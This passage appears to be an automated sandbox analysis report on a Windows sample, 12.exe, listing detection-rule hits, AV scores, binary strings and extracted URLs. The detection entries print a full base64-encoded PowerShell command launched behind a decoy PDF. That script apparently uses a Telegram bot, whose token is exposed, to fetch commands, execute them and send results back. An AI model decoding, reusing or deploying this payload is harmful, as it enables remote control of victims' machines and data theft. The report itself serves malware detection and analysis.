JABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQA
Sigma detected: Suspicious Execution of Powershell with Base64
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQA
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQA
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7176, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 12.exeVirustotal: Detection: 16%Perma Link
Source: 12.exeReversingLabs: Detection: 15%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: 12.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Admin\source\repos\ConsoleApplication5\x64\Release\ConsoleApplication5.pdb" source: 12.exe
Source: Binary string: mscorlib.pdb -+1 source: powershell.exe, 00000004.00000002.4214181744.000001D5D74C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 1 source: powershell.exe, 00000004.00000002.4214181744.000001D5D74C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.4214181744.000001D5D74C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ConsoleApplication5\x64\Release\ConsoleApplication5.pdb source: 12.exe
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F0AAE0 FindFirstFileExW,0_2_00007FF767F0AAE0
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: powershell.exe, 00000004.00000002.4155912559.000001D5C10B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C12E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF8E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0B43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFACB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF9B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF9E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1275000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
Source: powershell.exe, 00000004.00000002.4214181744.000001D5D74C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: powershell.exe, 00000004.00000002.4212393855.000001D5D7272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
Source: svchost.exe, 00000006.00000002.3406586492.000001FD0B600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000006.00000003.1768733771.000001FD0B818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000006.00000003.1768733771.000001FD0B818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000006.00000003.1768733771.000001FD0B818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000006.00000003.1768733771.000001FD0B818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000006.00000003.1768733771.000001FD0B84D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.4155343764.000001A33EBAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.4184547128.000001A34D25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.4184547128.000001A34D391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4207742599.000001D5CF392000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4207742599.000001D5CF250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.4155912559.000001D5BF40C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.4155343764.000001A33D1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF1E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.4155343764.000001A33E6E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.4155912559.000001D5BF40C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2D85F72862B55C4EADD9E66E06947F3D0.5.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000001.00000002.4155343764.000001A33D1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF1E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.4155912559.000001D5C0523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegrP
Source: powershell.exe, 00000004.00000002.4155912559.000001D5C10B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF8E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0B43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFACB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF9B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF9E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1275000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFB13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
Source: powershell.exe, 00000004.00000002.4155912559.000001D5BF1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF40C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 00000004.00000002.4155912559.000001D5C0FDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?
Source: powershell.exe, 00000004.00000002.4155912559.000001D5C10B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF8E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0B43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFACB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF9B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF9E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1275000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFB13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=
Source: powershell.exe, 00000004.00000002.4155912559.000001D5C09F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=124
Source: powershell.exe, 00000004.00000002.4155912559.000001D5BF972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=9894443
Source: powershell.exe, 00000004.00000002.4155912559.000001D5BF40C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0P
Source: powershell.exe, 00000004.00000002.4207742599.000001D5CF250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.4207742599.000001D5CF250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.4207742599.000001D5CF250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: qmgr.db.6.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000006.00000003.1768733771.000001FD0B856000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: qmgr.db.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: qmgr.db.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000004.00000002.4155912559.000001D5BF40C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.4155912559.000001D5BFB23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.4155343764.000001A33EBAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.4184547128.000001A34D25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.4184547128.000001A34D391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4207742599.000001D5CF392000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4207742599.000001D5CF250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000006.00000003.1768733771.000001FD0B856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000001.00000002.4155343764.000001A33E6E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.4155343764.000001A33E6E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

E-Banking Fraud

barindex
Malicious encrypted Powershell command line found
